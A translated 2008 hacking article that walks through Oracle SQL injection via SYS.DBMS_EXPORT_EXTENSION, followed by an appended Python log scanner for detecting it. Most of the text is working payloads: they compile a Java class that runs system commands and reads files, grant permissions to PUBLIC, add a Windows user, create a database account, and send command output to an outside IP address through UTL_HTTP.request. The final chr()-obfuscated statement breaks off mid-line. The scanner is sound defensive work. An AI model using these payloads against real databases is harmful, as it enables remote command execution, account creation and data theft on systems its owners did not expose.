The following example shows how the select SYS.DBMS_EXPORT_EXTENSION... statement is placed into an injectable condition:
/xxx.jsp?id=1 and 1<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
('a'|| is used so that the whole condition still evaluates to true.)
The statement is fairly long and may need to be submitted via POST.
The steps are as follows:
1. Create a package
By injecting the SYS.DBMS_EXPORT_EXTENSION function you can create a Java source named LinxUtil inside Oracle. It contains two functions: runCMD executes system commands and readFile reads files:
/xxx.jsp?id=1 and 1<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object { public static String runCMD(String args) { try { BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + ""; myReader.close(); return str; } catch (Exception e) { return e.toString(); } } public static String readFile(String filename) { try { BufferedReader myReader = new BufferedReader(new FileReader(filename)); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + ""; myReader.close(); return str; } catch (Exception e) { return e.toString(); } } }
; END; --, SYS, 0, 0) from dual
)
------------------------
If the URL has a length limit, you can omit the readFile() function block, that is:
/xxx.jsp?id=1 and 1<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object { public static String runCMD(String args) { try { BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp, str = ""; while ((stemp = myReader.readLine()) != null) str += stemp + ""; myReader.close(); return str; } catch (Exception e) { return e.toString(); } } }
; END; --, SYS, 0, 0) from dual
)
and skip the readFile()-related statements in the subsequent steps.
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission(PUBLIC, SYS:java.io.FilePermission, <<ALL FILES>>, execute); end; END; --, SYS, 0, 0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name LinxUtil.runCMD(java.lang.String) return String; END; --, SYS, 0, 1) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name LinxUtil.readFile(java.lang.String) return String; END; --, SYS, 0, 1) from dual
4. Grant PUBLIC permission to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD to public; END; --, SYS, 0, 1) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxReadFile to public; END; --, SYS, 0, 1) from dual
5. Test whether the preceding steps succeeded
and 1<>11||(
select OBJECT_ID from all_objects where object_name = 'LINXRUNCMD'
)
and 1<>(
select OBJECT_ID from all_objects where object_name = 'LINXREADFILE'
)
6. Run the following:
/xxx.jsp?id=1 and 1<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and 1<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" and "and 1<>'a'||" cannot simply be swapped for one another here.
To view the result of the call, use a union:
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
Or use UTL_HTTP.request():
/xxx.jsp?id=1 and 1<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'), '%20'), '%0A') FROM dual
)
/xxx.jsp?id=1 and 1<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(sys.LinxReadFile('c:/boot.ini'), '%20'), '%0A') FROM dual
)
Note: when UTL_HTTP.request is used, REPLACE() should be applied to replace spaces and line feeds in the output; otherwise the HTTP request cannot be submitted. utl_encode.base64_encode can be used as well.
--------------------
6. Internal changes
Run the following to view the changes made to all_objects:
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7. Delete the created function
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
drop function LinxRunCMD; END; --, SYS, 0, 1) from dual
==========================================================
End of the article. It is dedicated to my friends.
Linx
124829445
2008.1.12
Linyujian@bjfu.edu.cn
==========================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
create user linxsql identified by linxsql; END; --, SYS, 0, 1) from dual
That is, the same statement with its string arguments spelled out through chr() concatenation:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79), chr(66)||chr(65)||chr(82),
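As an added, defender-side example that is not part of the original article: a Python scanner that normalizes web access-log request lines, decodes the chr() concatenation chains shown in the last section, and flags the indicator strings this write-up relies on (DBMS_EXPORT_EXTENSION, GET_DOMAIN_INDEX_TABLES, dbms_java.grant_permission, UTL_HTTP.request and the others listed in INDICATORS). The log lines are constructed samples, not real traffic, and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Indicator strings taken from the injection steps described in the write-up.
INDICATORS = (
    "DBMS_EXPORT_EXTENSION",
    "GET_DOMAIN_INDEX_TABLES",
    "DBMS_JAVA.GRANT_PERMISSION",
    "COMPILE JAVA SOURCE",
    "UTL_HTTP.REQUEST",
    "AUTONOMOUS_TRANSACTION",
)

# A run of chr(NN) calls joined with ||, e.g. chr(70)||chr(79)||chr(79).
CHR_RUN = re.compile(r"chr\s*\(\s*\d+\s*\)(?:\s*\|\|\s*chr\s*\(\s*\d+\s*\))*", re.I)

def decode_chr_chains(sql: str) -> str:
    """Replace every chr() concatenation chain with the literal it spells."""
    def repl(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"
    return CHR_RUN.sub(repl, sql)

def normalize(request_line: str) -> str:
    """URL-decode twice (double encoding), decode chr() chains, collapse
    whitespace and upper-case so indicator matching is a plain substring test."""
    text = decode_chr_chains(unquote_plus(unquote_plus(request_line)))
    return " ".join(text.split()).upper()

def scan_line(line: str) -> list:
    """Indicators present in one access-log line (empty list if none)."""
    norm = normalize(line)
    return [ind for ind in INDICATORS if ind in norm]

def scan_log(lines) -> list:
    """(line_number, indicators) for every line that matched an indicator."""
    return [(i, hits) for i, ln in enumerate(lines, 1) if (hits := scan_line(ln))]

# Constructed sample log lines (not real traffic); the third hides the package name in a chr() chain.
OBFUSCATED = "||".join(f"chr({ord(c)})" for c in "DBMS_EXPORT_EXTENSION")
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2008:10:00:01] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Jan/2008:10:00:02] "GET /xxx.jsp?id=1%20and%201%3C%3E%27a%27%7C%7C'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(...)) HTTP/1.1" 500 0',
    '10.0.0.9 - - [12/Jan/2008:10:00:03] "GET /xxx.jsp?id=1%20and%201%3C%3E(select%20'
    + OBFUSCATED + '%20from%20dual) HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Matching is done on the decoded, upper-cased request, so simple case changes, percent-encoding and chr() spelling of the package name do not evade it.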